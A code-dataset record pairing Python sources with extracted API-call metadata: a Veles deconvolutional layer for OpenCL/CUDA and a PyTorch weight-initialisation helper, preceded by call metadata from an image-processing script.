get_exif, get_trip, raw2rgbg, mdwrite, raw_read_rgb, check_exif, extract_exif\n'), ((4033, 4047), 'utils.io.get_trip', 'get_trip', (['root'], {}), '(root)\n', (4041, 4047), False, 'from utils.io import imread, imwrite, get_exif, get_trip, raw2rgbg, mdwrite, raw_read_rgb, check_exif, extract_exif\n'), ((4822, 4836), 'utils.io.get_trip', 'get_trip', (['root'], {}), '(root)\n', (4830, 4836), False, 'from utils.io import imread, imwrite, get_exif, get_trip, raw2rgbg, mdwrite, raw_read_rgb, check_exif, extract_exif\n'), ((5888, 5902), 'utils.io.get_trip', 'get_trip', (['root'], {}), '(root)\n', (5896, 5902), False, 'from utils.io import imread, imwrite, get_exif, get_trip, raw2rgbg, mdwrite, raw_read_rgb, check_exif, extract_exif\n'), ((7166, 7189), 'utils.io.imwrite', 'imwrite', (['outputs[3]', 'fo'], {}), '(outputs[3], fo)\n', (7173, 7189), False, 'from utils.io import imread, imwrite, get_exif, get_trip, raw2rgbg, mdwrite, raw_read_rgb, check_exif, extract_exif\n'), ((7304, 7329), 'utils.io.imwrite', 'imwrite', (['outputs[4]', 'tran'], {}), '(outputs[4], tran)\n', (7311, 7329), False, 'from utils.io import imread, imwrite, get_exif, get_trip, raw2rgbg, mdwrite, raw_read_rgb, check_exif, extract_exif\n'), ((7381, 7395), 'utils.io.get_trip', 'get_trip', (['root'], {}), '(root)\n', (7389, 7395), False, 'from utils.io import imread, imwrite, get_exif, get_trip, raw2rgbg, mdwrite, raw_read_rgb, check_exif, extract_exif\n'), ((8454, 8469), 'numpy.array', 'np.array', (['sizes'], {}), '(sizes)\n', (8462, 8469), True, 'import numpy as np\n'), ((807, 832), 'utils.io.parse_tripr', 'parse_tripr', (['input_folder'], {}), '(input_folder)\n', (818, 832), False, 'from utils.io import parse_tripr\n'), ((1052, 1067), 'utils.io.raw_read_rgb', 'raw_read_rgb', (['x'], {}), '(x)\n', (1064, 1067), False, 'from utils.io import imread, imwrite, get_exif, get_trip, raw2rgbg, mdwrite, raw_read_rgb, check_exif, extract_exif\n'), ((1160, 1177), 'utils.io.imwrite', 'imwrite', (['out', 'rgb'], {}), '(out, rgb)\n', (1167, 1177), False, 'from utils.io import imread, imwrite, get_exif, get_trip, raw2rgbg, mdwrite, raw_read_rgb, check_exif, extract_exif\n'), ((1205, 1220), 'rawpy.imread', 'rawpy.imread', (['x'], {}), '(x)\n', (1217, 1220), False, 'import rawpy\n'), ((1631, 1646), 'rawpy.imread', 'rawpy.imread', (['x'], {}), '(x)\n', (1643, 1646), False, 'import rawpy\n'), ((2195, 2226), 'os.path.join', 'osp.join', (['root', '"""rgb"""', '"""origin"""'], {}), "(root, 'rgb', 'origin')\n", (2203, 2226), True, 'import os.path as osp\n'), ((2225, 2257), 'os.path.join', 'osp.join', (['root', '"""rgb"""', '"""derived"""'], {}), "(root, 'rgb', 'derived')\n", (2233, 2257), True, 'import os.path as osp\n'), ((2288, 2296), 'utils.path.mkdir', 'mkdir', (['d'], {}), '(d)\n', (2293, 2296), False, 'from utils.path import be, bj, mkdir\n'), ((2532, 2540), 'multiprocessing.Pool', 'Pool', (['(16)'], {}), '(16)\n', (2536, 2540), False, 'from multiprocessing import Pool, RawArray\n'), ((2665, 2694), 'os.path.join', 'osp.join', (['root', "(root + '.csv')"], {}), "(root, root + '.csv')\n", (2673, 2694), True, 'import os.path as osp\n'), ((2716, 2742), 'os.path.join', 'osp.join', (['root', '"""trip.csv"""'], {}), "(root, 'trip.csv')\n", (2724, 2742), True, 'import os.path as osp\n'), ((2800, 2824), 'os.path.join', 'osp.join', (['root', '"""bb.csv"""'], {}), "(root, 'bb.csv')\n", (2808, 2824), True, 'import os.path as osp\n'), ((3102, 3114), 'cv2.imread', 'cv.imread', (['i'], {}), '(i)\n', (3111, 3114), True, 'import cv2 as cv\n'), ((3336, 3365), 'os.path.join', 'osp.join', (['root', 'fmt', '"""origin"""'], {}), "(root, fmt, 'origin')\n", (3344, 3365), True, 'import os.path as osp\n'), ((3364, 3394), 'os.path.join', 'osp.join', (['root', 'fmt', '"""derived"""'], {}), "(root, fmt, 'derived')\n", (3372, 3394), True, 'import os.path as osp\n'), ((3589, 3631), 'os.path.join', 'osp.join', (['root', 'fmt', '"""thumbnail"""', '"""origin"""'], {}), "(root, fmt, 'thumbnail', 'origin')\n", (3597, 3631), True, 'import os.path as osp\n'), ((3629, 3672), 'os.path.join', 'osp.join', (['root', 'fmt', '"""thumbnail"""', '"""derived"""'], {}), "(root, fmt, 'thumbnail', 'derived')\n", (3637, 3672), True, 'import os.path as osp\n'), ((3702, 3710), 'utils.path.mkdir', 'mkdir', (['d'], {}), '(d)\n', (3707, 3710), False, 'from utils.path import be, bj, mkdir\n'), ((3903, 3911), 'multiprocessing.Pool', 'Pool', (['(16)'], {}), '(16)\n', (3907, 3911), False, 'from multiprocessing import Pool, RawArray\n'), ((4062, 4103), 'os.path.join', 'osp.join', (['imformat', '"""thumbnail"""', '"""origin"""'], {}), "(imformat, 'thumbnail', 'origin')\n", (4070, 4103), True, 'import os.path as osp\n'), ((4102, 4144), 'os.path.join', 'osp.join', (['imformat', '"""thumbnail"""', '"""derived"""'], {}), "(imformat, 'thumbnail', 'derived')\n", (4110, 4144), True, 'import os.path as osp\n'), ((4341, 4377), 'os.path.join', 'osp.join', (['root', 'f"""five{imformat}.md"""'], {}), "(root, f'five{imformat}.md')\n", (4349, 4377), True, 'import os.path as osp\n'), ((4650, 4662), 'cv2.imread', 'cv.imread', (['i'], {}), '(i)\n', (4659, 4662), True, 'import cv2 as cv\n'), ((4719, 4793), 'cv2.imwrite', 'cv.imwrite', (['o', 'img[h_start:h_start + h_offset, w_start:w_start + w_offset]'], {}), '(o, img[h_start:h_start + h_offset, w_start:w_start + w_offset])\n', (4729, 4793), True, 'import cv2 as cv\n'), ((4850, 4881), 'os.path.join', 'osp.join', (['root', '"""rgb"""', '"""origin"""'], {}), "(root, 'rgb', 'origin')\n", (4858, 4881), True, 'import os.path as osp\n'), ((4880, 4912), 'os.path.join', 'osp.join', (['root', '"""rgb"""', '"""derived"""'], {}), "(root, 'rgb', 'derived')\n", (4888, 4912), True, 'import os.path as osp\n'), ((5107, 5139), 'os.path.join', 'osp.join', (['root', '"""rgbc"""', '"""origin"""'], {}), "(root, 'rgbc', 'origin')\n", (5115, 5139), True, 'import os.path as osp\n'), ((5138, 5171), 'os.path.join', 'osp.join', (['root', '"""rgbc"""', '"""derived"""'], {}), "(root, 'rgbc', 'derived')\n", (5146, 5171), True, 'import os.path as osp\n'), ((5202, 5210), 'utils.path.mkdir', 'mkdir', (['d'], {}), '(d)\n', (5207, 5210), False, 'from utils.path import be, bj, mkdir\n'), ((5563, 5571), 'multiprocessing.Pool', 'Pool', (['(16)'], {}), '(16)\n', (5567, 5571), False, 'from multiprocessing import Pool, RawArray\n'), ((5842, 5857), 'utils.io.imwrite', 'imwrite', (['o', 'img'], {}), '(o, img)\n', (5849, 5857), False, 'from utils.io import imread, imwrite, get_exif, get_trip, raw2rgbg, mdwrite, raw_read_rgb, check_exif, extract_exif\n'), ((5916, 5948), 'os.path.join', 'osp.join', (['root', '"""rawc"""', '"""origin"""'], {}), "(root, 'rawc', 'origin')\n", (5924, 5948), True, 'import os.path as osp\n'), ((5947, 5980), 'os.path.join', 'osp.join', (['root', '"""rawc"""', '"""derived"""'], {}), "(root, 'rawc', 'derived')\n", (5955, 5980), True, 'import os.path as osp\n'), ((6175, 6220), 'os.path.join', 'osp.join', (['root', '"""rawc"""', '"""thumbnail"""', '"""origin"""'], {}), "(root, 'rawc', 'thumbnail', 'origin')\n", (6183, 6220), True, 'import os.path as osp\n'), ((6218, 6264), 'os.path.join', 'osp.join', (['root', '"""rawc"""', '"""thumbnail"""', '"""derived"""'], {}), "(root, 'rawc', 'thumbnail', 'derived')\n", (6226, 6264), True, 'import os.path as osp\n'), ((6294, 6302), 'utils.path.mkdir', 'mkdir', (['d'], {}), '(d)\n', (6299, 6302), False, 'from utils.path import be, bj, mkdir\n'), ((6495, 6503), 'multiprocessing.Pool', 'Pool', (['(16)'], {}), '(16)\n', (6499, 6503), False, 'from multiprocessing import Pool, RawArray\n'), ((6694, 6703), 'utils.io.imread', 'imread', (['x'], {}), '(x)\n', (6700, 6703), False, 'from utils.io import imread, imwrite, get_exif, get_trip, raw2rgbg, mdwrite, raw_read_rgb, check_exif, extract_exif\n'), ((7037, 7054), 'utils.io.imwrite', 'imwrite', (['out', 'raw'], {}), '(out, raw)\n', (7044, 7054), False, 'from utils.io import imread, imwrite, get_exif, get_trip, raw2rgbg, mdwrite, raw_read_rgb, check_exif, extract_exif\n'), ((7481, 7513), 'os.path.join', 'osp.join', (['root', '"""rawc"""', '"""origin"""'], {}), "(root, 'rawc', 'origin')\n", (7489, 7513), True, 'import os.path as osp\n'), ((7512, 7545), 'os.path.join', 'osp.join', (['root', '"""rawc"""', '"""derived"""'], {}), "(root, 'rawc', 'derived')\n", (7520, 7545), True, 'import os.path as osp\n'), ((7576, 7584), 'utils.path.mkdir', 'mkdir', (['d'], {}), '(d)\n', (7581, 7584), False, 'from utils.path import be, bj, mkdir\n'), ((7913, 7921), 'multiprocessing.Pool', 'Pool', (['(16)'], {}), '(16)\n', (7917, 7921), False, 'from multiprocessing import Pool, RawArray\n'), ((8304, 8336), 'os.path.join', 'osp.join', (['root', '"""rgbc"""', '"""origin"""'], {}), "(root, 'rgbc', 'origin')\n", (8312, 8336), True, 'import os.path as osp\n'), ((8346, 8362), 'os.listdir', 'os.listdir', (['root'], {}), '(root)\n', (8356, 8362), False, 'import os\n'), ((8513, 8538), 'numpy.histogram', 'np.histogram', (['sizes[:, 0]'], {}), '(sizes[:, 0])\n', (8525, 8538), True, 'import numpy as np\n'), ((8549, 8574), 'numpy.histogram', 'np.histogram', (['sizes[:, 1]'], {}), '(sizes[:, 1])\n', (8561, 8574), True, 'import numpy as np\n'), ((8929, 8945), 'utils.io.get_trip', 'get_trip', (['subdir'], {}), '(subdir)\n', (8937, 8945), False, 'from utils.io import imread, imwrite, get_exif, get_trip, raw2rgbg, mdwrite, raw_read_rgb, check_exif, extract_exif\n'), ((851, 885), 'os.path.join', 'osp.join', (['input_folder', '"""trip.csv"""'], {}), "(input_folder, 'trip.csv')\n", (859, 885), True, 'import os.path as osp\n'), ((2326, 2359), 'os.path.join', 'osp.join', (['out_dirs[0]', "(x + '.jpg')"], {}), "(out_dirs[0], x + '.jpg')\n", (2334, 2359), True, 'import os.path as osp\n'), ((2424, 2457), 'os.path.join', 'osp.join', (['out_dirs[1]', "(x + '.jpg')"], {}), "(out_dirs[1], x + '.jpg')\n", (2432, 2457), True, 'import os.path as osp\n'), ((2999, 3009), 'pprint.pformat', 'pformat', (['a'], {}), '(a)\n', (3006, 3009), False, 'from pprint import pformat\n'), ((3236, 3267), 'cv2.resize', 'cv.resize', (['im', 'None'], {'fx': 'r', 'fy': 'r'}), '(im, None, fx=r, fy=r)\n', (3245, 3267), True, 'import cv2 as cv\n'), ((3423, 3455), 'os.path.join', 'osp.join', (['in_dirs[0]', "(x + '.jpg')"], {}), "(in_dirs[0], x + '.jpg')\n", (3431, 3455), True, 'import os.path as osp\n'), ((3520, 3552), 'os.path.join', 'osp.join', (['in_dirs[1]', "(x + '.jpg')"], {}), "(in_dirs[1], x + '.jpg')\n", (3528, 3552), True, 'import os.path as osp\n'), ((3740, 3773), 'os.path.join', 'osp.join', (['out_dirs[0]', "(x + '.jpg')"], {}), "(out_dirs[0], x + '.jpg')\n", (3748, 3773), True, 'import os.path as osp\n'), ((3838, 3871), 'os.path.join', 'osp.join', (['out_dirs[1]', "(x + '.jpg')"], {}), "(out_dirs[1], x + '.jpg')\n", (3846, 3871), True, 'import os.path as osp\n'), ((4941, 4973), 'os.path.join', 'osp.join', (['in_dirs[0]', "(x + '.jpg')"], {}), "(in_dirs[0], x + '.jpg')\n", (4949, 4973), True, 'import os.path as osp\n'), ((5038, 5070), 'os.path.join', 'osp.join', (['in_dirs[1]', "(x + '.jpg')"], {}), "(in_dirs[1], x + '.jpg')\n", (5046, 5070), True, 'import os.path as osp\n'), ((5240, 5273), 'os.path.join', 'osp.join', (['out_dirs[0]', "(x + '.jpg')"], {}), "(out_dirs[0], x + '.jpg')\n", (5248, 5273), True, 'import os.path as osp\n'), ((5338, 5371), 'os.path.join', 'osp.join', (['out_dirs[1]', "(x + '.jpg')"], {}), "(out_dirs[1], x + '.jpg')\n", (5346, 5371), True, 'import os.path as osp\n'), ((6009, 6041), 'os.path.join', 'osp.join', (['in_dirs[0]', "(x + '.png')"], {}), "(in_dirs[0], x + '.png')\n", (6017, 6041), True, 'import os.path as osp\n'), ((6106, 6138), 'os.path.join', 'osp.join', (['in_dirs[1]', "(x + '.png')"], {}), "(in_dirs[1], x + '.png')\n", (6114, 6138), True, 'import os.path as osp\n'), ((6332, 6365), 'os.path.join', 'osp.join', (['out_dirs[0]', "(x + '.jpg')"], {}), "(out_dirs[0], x + '.jpg')\n", (6340, 6365), True, 'import os.path as osp\n'), ((6430, 6463), 'os.path.join', 'osp.join', (['out_dirs[1]', "(x + '.jpg')"], {}), "(out_dirs[1], x + '.jpg')\n", (6438, 6463), True, 'import os.path as osp\n'), ((7614, 7647), 'os.path.join', 'osp.join', (['out_dirs[0]', "(x + '.png')"], {}), "(out_dirs[0], x + '.png')\n", (7622, 7647), True, 'import os.path as osp\n'), ((7712, 7745), 'os.path.join', 'osp.join', (['out_dirs[1]', "(x + '.png')"], {}), "(out_dirs[1], x + '.png')\n", (7720, 7745), True, 'import os.path as osp\n'), ((5732, 5741), 'utils.io.imread', 'imread', (['x'], {}), '(x)\n', (5738, 5741), False, 'from utils.io import imread, imwrite, get_exif, get_trip, raw2rgbg, mdwrite, raw_read_rgb, check_exif, extract_exif\n'), ((2139, 2172), 'os.path.join', 'osp.join', (['root', '"""raw"""', "(x + '.dng')"], {}), "(root, 'raw', x + '.dng')\n", (2147, 2172), True, 'import os.path as osp\n'), ((4183, 4216), 'os.path.join', 'osp.join', (['out_dirs[0]', "(x + '.jpg')"], {}), "(out_dirs[0], x + '.jpg')\n", (4191, 4216), True, 'import os.path as osp\n'), ((4294, 4327), 'os.path.join', 'osp.join', (['out_dirs[1]', "(x + '.jpg')"], {}), "(out_dirs[1], x + '.jpg')\n", (4302, 4327), True, 'import os.path as osp\n'), ((5416, 5445), 'os.path.join', 'osp.join', (['root', "(root + '.csv')"], {}), "(root, root + '.csv')\n", (5424, 5445), True, 'import os.path as osp\n'), ((7425, 7458), 'os.path.join', 'osp.join', (['root', '"""raw"""', "(x + '.dng')"], {}), "(root, 'raw', x + '.dng')\n", (7433, 7458), True, 'import os.path as osp\n'), ((7789, 7818), 'os.path.join', 'osp.join', (['root', "(root + '.csv')"], {}), "(root, root + '.csv')\n", (7797, 7818), True, 'import os.path as osp\n'), ((8419, 8436), 'os.path.join', 'osp.join', (['root', 'f'], {}), '(root, f)\n', (8427, 8436), True, 'import os.path as osp\n')]
|
# -*- coding: utf-8 -*-
"""
.. invisible:
_ _ _____ _ _____ _____
| | | | ___| | | ___/ ___|
| | | | |__ | | | |__ \ `--.
| | | | __|| | | __| `--. \
\ \_/ / |___| |___| |___/\__/ /
\___/\____/\_____|____/\____/
Created on Jul 1, 2014
Deconvolutional layer.
███████████████████████████████████████████████████████████████████████████████
Licensed to the Apache Software Foundation (ASF) under one
or more contributor license agreements. See the NOTICE file
distributed with this work for additional information
regarding copyright ownership. The ASF licenses this file
to you under the Apache License, Version 2.0 (the
"License"); you may not use this file except in compliance
with the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing,
software distributed under the License is distributed on an
"AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
KIND, either express or implied. See the License for the
specific language governing permissions and limitations
under the License.
███████████████████████████████████████████████████████████████████████████████
"""
from __future__ import division
import cuda4py.blas as cublas
import numpy
from zope.interface import implementer
from veles.config import root
from veles.compat import from_none
from veles.accelerated_units import IOpenCLUnit, ICUDAUnit, INumpyUnit
from veles.memory import Array
import veles.ocl_blas as ocl_blas
from veles.znicz.conv import ConvolutionalBase
import veles.znicz.nn_units as nn_units
from veles.distributable import TriviallyDistributable
@implementer(IOpenCLUnit, ICUDAUnit, INumpyUnit)
class Deconv(TriviallyDistributable, ConvolutionalBase, nn_units.Forward):
# TriviallyDistributable overrides nn_units.Forward IDistributable
"""Deconvolutional layer for simple convolutional layer
with linear activation and without bias.
Must be assigned before initialize():
input
weights
output_shape_source
Updates after run():
output
Creates within initialize():
output
Attributes:
input: input as batch of multichannel interleaved images.
output: output as batch of multichannel interleaved images.
weights: matrix of weights.
output_shape_source: Array to get output shape from.
n_kernels: number of convolutional kernels
in the corresponding convolutional layer.
kx: kernel width.
ky: kernel height.
sliding: tuple of kernel sliding (by x-axis, by y-axis),
kx, ky MUST be a multiple of sliding to avoid irregularities.
padding: tuple of virtual sample padding (left, top, right, bottom),
will be computed automatically based on sliding.
weights_transposed: assume weights matrix as a transposed one.
unsafe_padding: flag to enable unsafe padding and/or sliding.
"""
MAPPING = {"deconv"}
@staticmethod
def compute_padding(sx, sy, kx, ky, sliding):
"""Computes required padding.
"""
return (kx - sliding[1], ky - sliding[0],
kx - sx % sliding[1] if sx % sliding[1] != 0
else kx - sliding[1],
ky - sy % sliding[0] if sy % sliding[0] != 0
else ky - sliding[0])
@staticmethod
def check_padding_is_safe(kx, ky, sliding):
if sliding[0] > (ky >> 1) or sliding[1] > (kx >> 1):
raise ValueError(
"sliding should not be greater than half of the kernel size")
if kx % sliding[0] != 0 or kx % sliding[1] != 0:
raise ValueError(
"Kernel size should be multiple of sliding")
def __init__(self, workflow, **kwargs):
super(Deconv, self).__init__(workflow, **kwargs)
self.unsafe_padding = kwargs.get("unsafe_padding", False)
self.hits = Array()
self.krn_clear_output_ = None
self._global_size = None
self._local_size = None
del self.bias
self.demand("n_kernels", "kx", "ky", "padding", "sliding",
"input", "weights", "output_shape_source")
def init_unpickled(self):
super(Deconv, self).init_unpickled()
self.sources_["deconv/forward"] = {}
def initialize(self, device, **kwargs):
super(Deconv, self).initialize(device, **kwargs)
self._dtype = self.input.dtype
self.weights_shape = (tuple(reversed(self.weights.shape))
if self.weights_transposed
else self.weights.shape)
if hasattr(self, "bias"):
raise ValueError("bias should not be set")
if (len(self.input.shape) != 4 or
self.input.shape[3] != self.n_kernels):
raise ValueError("Incorrectly shaped input encountered")
if (len(self.weights_shape) != 2 or
self.weights_shape[0] != self.n_kernels or
self.weights_shape[1] % (self.kx * self.ky) != 0):
raise ValueError("Incorrectly shaped weights encountered")
output_shape = tuple(self.output_shape_source.shape)
if len(output_shape) != 4:
raise ValueError("Incorrect output_shape_source shape")
if output_shape[0] != self.input.shape[0]:
raise ValueError(
"output_shape_source.shape[0] != input.shape[0]")
try:
self.check_padding_is_safe(self.kx, self.ky, self.sliding)
except ValueError as e:
if not self.unsafe_padding:
raise from_none(e)
self.warning("The padding will be unsafe")
self._create_hits(output_shape)
padding = Deconv.compute_padding(
output_shape[2], output_shape[1], self.kx, self.ky, self.sliding)
if self.padding is None: # pylint: disable=E0203
self.padding = padding
elif self.padding != padding:
if not self.unsafe_padding:
raise ValueError(
"Expected padding %s but got %s" % (padding, self.padding))
self._create_hits(output_shape)
if self.output:
assert self.output.shape[1:] == output_shape[1:]
if not self.output or self.output.shape[0] != output_shape[0]:
self.output.reset(numpy.zeros(output_shape,
dtype=self._dtype))
self._output_shape = output_shape
self._sy, self._sx, self._n_channels = self._output_shape[1:]
self._kernel_size = self.kx * self.ky * self._n_channels
self._kernel_app_per_image = self.input.sample_size // self.n_kernels
self._kernel_app_total = (self._kernel_app_per_image *
self.input.shape[0])
self.init_vectors(self.input, self.weights, self.output, self.hits)
def _create_hits(self, output_shape):
if not self.hits:
self.hits.reset(
numpy.zeros(output_shape, dtype=numpy.int32))
else:
assert self.hits.size == int(numpy.prod(output_shape))
def _gpu_init(self, blas_class):
defines = {
"USE_ATOMICS": 1,
"WEIGHTS_TRANSPOSED": int(self.weights_transposed),
"BATCH": self._output_shape[0],
"SX": self._sx,
"SY": self._sy,
"N_CHANNELS": self._n_channels,
"KX": self.kx,
"KY": self.ky,
"N_KERNELS": self.n_kernels,
"PAD_LEFT": self.padding[0],
"PAD_TOP": self.padding[1],
"PAD_RIGHT": self.padding[2],
"PAD_BOTTOM": self.padding[3],
"SLIDE_X": self.sliding[0],
"SLIDE_Y": self.sliding[1],
"USE_HITS": int(bool(self.hits)),
"DECONV_MODE": int(bool(self.hits)) + 1,
"OUTPUT_SIZE": self.output.size
}
self.build_program(
defines, "%s/%s_%d_%dx%dx%d_%dx%d_%d" % (
root.common.dirs.cache, self.__class__.__name__,
self.input.shape[0],
self._output_shape[2], self._output_shape[1],
self._output_shape[3],
self.kx, self.ky, self.n_kernels), dtype=self._dtype)
self.krn_pack_ = self.get_kernel("DirectPack")
unpack_bytes = (self._kernel_app_per_image * self.unpack_size *
self._kernel_size * self.input.itemsize)
self.device.request_temp_buffer(unpack_bytes)
if self.hits:
self.krn_pack_.set_arg(3, self.hits.devmem)
self.krn_apply_hits_ = self.get_kernel("apply_hits")
self.krn_apply_hits_.set_args(self.output.devmem, self.hits.devmem)
self.gemm_ = blas_class.gemm(self._dtype)
self.np_one = numpy.ones(1, dtype=self._dtype)
self.np_zero = numpy.zeros(1, dtype=self._dtype)
self._const_i = numpy.zeros(1, dtype=numpy.int64)
def ocl_init(self):
ocl_blas.OCLBLAS.attach_to_device(self.device)
self._gpu_init(ocl_blas.OCLBLAS)
self._global_size_pack = lambda size: (size,)
self._local_size_pack = None
if self.hits:
self.krn_clear_hits_ = self.get_kernel("clear_hits")
self.krn_clear_hits_.set_arg(0, self.hits.devmem)
self._global_size_hits = (self.output.size,)
self._local_size_hits = None
self.krn_clear_output_ = self.get_kernel("clear_output")
self.krn_clear_output_.set_arg(0, self.output.devmem)
self._clear_output = lambda: (
self.execute_kernel((self.output.size,), None,
self.krn_clear_output_))
self._clear_hits = lambda: (
self.execute_kernel((self.hits.size,), None, self.krn_clear_hits_))
self._process_subblock = self._ocl_process_subblock
self.krn_pack_.set_arg(1, self.output.devmem)
def cuda_init(self):
self._gpu_init(cublas.CUBLAS)
block_size = self.device.suggest_block_size(self.krn_pack_)
self._global_size_pack = (
lambda size: (int(numpy.ceil(size / block_size)), 1, 1))
self._local_size_pack = (block_size, 1, 1)
if self.hits:
block_size = self.device.suggest_block_size(self.krn_apply_hits_)
self._global_size_hits = (
int(numpy.ceil(self.output.size / block_size)), 1, 1)
self._local_size_hits = (block_size, 1, 1)
self._clear_output = lambda: self.output.devmem.memset32_async()
self._clear_hits = lambda: self.hits.devmem.memset32_async()
self._process_subblock = self._cuda_process_subblock
def ocl_run(self):
self.gpu_run()
def cuda_run(self):
self.gpu_run()
def gpu_run(self):
self.unmap_vectors(self.output, self.input, self.weights)
unpack_data = self.device.get_temp_buffer()
self._clear_output()
if self.hits:
self.hits.unmap()
self._clear_hits()
batch_size = self.output.shape[0]
for i in range(0, batch_size, self.unpack_size):
self._process_subblock(i, min(batch_size - i, self.unpack_size),
unpack_data)
if self.hits:
self.execute_kernel(self._global_size_hits, self._local_size_hits,
self.krn_apply_hits_)
def _cuda_process_subblock(self, start_image, image_count, unpack_data):
output_offs = (start_image * self.input.sample_size *
self.input.itemsize)
unpack_side = self._kernel_app_per_image * image_count
self.gemm_(
self.device.blas, cublas.CUBLAS_OP_T if self.weights_transposed
else cublas.CUBLAS_OP_N, cublas.CUBLAS_OP_N,
self._kernel_size, unpack_side, self.weights_shape[0],
self.np_one, self.weights.devmem,
int(self.input.devmem) + output_offs,
self.np_zero, unpack_data)
self.krn_pack_.set_arg(0, unpack_data)
self.krn_pack_.set_arg(
1, int(self.output.devmem) +
start_image * self.output.sample_size * self.output.itemsize)
limit = unpack_side * self._kernel_size
self._const_i[0] = limit
self.krn_pack_.set_arg(2, self._const_i)
self.execute_kernel(self._global_size_pack(limit),
self._local_size_pack, self.krn_pack_)
def _ocl_process_subblock(self, start_image, image_count, unpack_data):
output_offs = start_image * self.input.sample_size
unpack_side = self._kernel_app_per_image * image_count
self.gemm_(
self.device.blas, cublas.CUBLAS_OP_T if self.weights_transposed
else cublas.CUBLAS_OP_N, cublas.CUBLAS_OP_N,
self._kernel_size, unpack_side, self.weights_shape[0],
self.np_one, self.weights.devmem,
self.input.devmem,
self.np_zero, unpack_data, offsetB=output_offs)
self.krn_pack_.set_arg(0, unpack_data)
self._const_i[0] = start_image * self.output.sample_size
self.krn_pack_.set_arg(2, self._const_i)
limit = unpack_side * self._kernel_size
self.execute_kernel(self._global_size_pack(limit),
self._local_size_pack, self.krn_pack_)
def numpy_run(self):
raise NotImplementedError()
|
[
"numpy.ceil",
"veles.ocl_blas.OCLBLAS.attach_to_device",
"zope.interface.implementer",
"numpy.zeros",
"numpy.ones",
"veles.compat.from_none",
"veles.memory.Array",
"numpy.prod"
] |
[((1689, 1736), 'zope.interface.implementer', 'implementer', (['IOpenCLUnit', 'ICUDAUnit', 'INumpyUnit'], {}), '(IOpenCLUnit, ICUDAUnit, INumpyUnit)\n', (1700, 1736), False, 'from zope.interface import implementer\n'), ((3993, 4000), 'veles.memory.Array', 'Array', ([], {}), '()\n', (3998, 4000), False, 'from veles.memory import Array\n'), ((8909, 8941), 'numpy.ones', 'numpy.ones', (['(1)'], {'dtype': 'self._dtype'}), '(1, dtype=self._dtype)\n', (8919, 8941), False, 'import numpy\n'), ((8965, 8998), 'numpy.zeros', 'numpy.zeros', (['(1)'], {'dtype': 'self._dtype'}), '(1, dtype=self._dtype)\n', (8976, 8998), False, 'import numpy\n'), ((9023, 9056), 'numpy.zeros', 'numpy.zeros', (['(1)'], {'dtype': 'numpy.int64'}), '(1, dtype=numpy.int64)\n', (9034, 9056), False, 'import numpy\n'), ((9090, 9136), 'veles.ocl_blas.OCLBLAS.attach_to_device', 'ocl_blas.OCLBLAS.attach_to_device', (['self.device'], {}), '(self.device)\n', (9123, 9136), True, 'import veles.ocl_blas as ocl_blas\n'), ((6436, 6480), 'numpy.zeros', 'numpy.zeros', (['output_shape'], {'dtype': 'self._dtype'}), '(output_shape, dtype=self._dtype)\n', (6447, 6480), False, 'import numpy\n'), ((7091, 7135), 'numpy.zeros', 'numpy.zeros', (['output_shape'], {'dtype': 'numpy.int32'}), '(output_shape, dtype=numpy.int32)\n', (7102, 7135), False, 'import numpy\n'), ((5687, 5699), 'veles.compat.from_none', 'from_none', (['e'], {}), '(e)\n', (5696, 5699), False, 'from veles.compat import from_none\n'), ((7192, 7216), 'numpy.prod', 'numpy.prod', (['output_shape'], {}), '(output_shape)\n', (7202, 7216), False, 'import numpy\n'), ((10234, 10263), 'numpy.ceil', 'numpy.ceil', (['(size / block_size)'], {}), '(size / block_size)\n', (10244, 10263), False, 'import numpy\n'), ((10484, 10525), 'numpy.ceil', 'numpy.ceil', (['(self.output.size / block_size)'], {}), '(self.output.size / block_size)\n', (10494, 10525), False, 'import numpy\n')]
|
# @Author: <NAME> <narsi>
# @Date: 2018-11-12T14:06:36-06:00
# @Last modified by: narsi
# @Last modified time: 2019-01-27T20:55:47-06:00
import numpy as np
import torch
import torch.nn as nn
import torch.nn.init as init
'''
https://gist.github.com/jeasinema/ed9236ce743c8efaf30fa2ff732749f5
'''
def weight_init(m):
'''
Usage:
model = Model()
model.apply(weight_init)
'''
if isinstance(m, nn.Conv1d):
init.normal(m.weight.data)
try:
init.normal(m.bias.data)
except:
pass
elif isinstance(m, nn.Conv2d):
init.xavier_uniform_(m.weight.data , gain=np.sqrt(2))
try:
init.constant_(m.bias.data, 0)
except:
pass
elif isinstance(m, nn.Conv3d):
init.xavier_uniform_(m.weight.data , gain=np.sqrt(2))
try:
init.normal(m.bias.data)
except:
pass
elif isinstance(m, nn.ConvTranspose1d):
init.normal(m.weight.data)
try:
init.normal(m.bias.data)
except:
pass
elif isinstance(m, nn.ConvTranspose2d):
init.xavier_uniform_(m.weight.data , gain=np.sqrt(2))
try:
init.normal(m.bias.data)
except:
pass
elif isinstance(m, nn.ConvTranspose3d):
init.xavier_uniform_(m.weight.data , gain=np.sqrt(2))
try:
init.normal(m.bias.data)
except:
pass
elif isinstance(m, nn.BatchNorm1d):
init.constant_(m.weight.data, 1)
try:
init.constant_(m.bias.data, 0)
except:
pass
elif isinstance(m, nn.BatchNorm2d):
try:
init.constant_(m.weight.data, 1)
except:
pass
try:
init.constant_(m.bias.data, 0)
except:
pass
elif isinstance(m, nn.BatchNorm3d):
init.constant_(m.weight.data, 1)
try:
init.constant_(m.bias.data, 0)
except:
pass
elif isinstance(m, nn.Linear):
init.xavier_uniform_(m.weight.data , gain=np.sqrt(2))
try:
init.constant_(m.bias.data, 0)
except:
pass
elif isinstance(m, nn.LSTM):
for param in m.parameters():
if len(param.shape) >= 2:
init.orthogonal(param.data)
else:
init.normal(param.data)
elif isinstance(m, nn.LSTMCell):
for param in m.parameters():
if len(param.shape) >= 2:
init.orthogonal(param.data)
else:
init.normal(param.data)
elif isinstance(m, nn.GRU):
for param in m.parameters():
if len(param.shape) >= 2:
init.orthogonal(param.data)
else:
init.normal(param.data)
elif isinstance(m, nn.GRUCell):
for param in m.parameters():
if len(param.shape) >= 2:
init.orthogonal(param.data)
else:
init.normal(param.data)
if __name__ == '__main__':
pass
|
[
"torch.nn.init.normal",
"torch.nn.init.constant_",
"torch.nn.init.orthogonal",
"numpy.sqrt"
] |
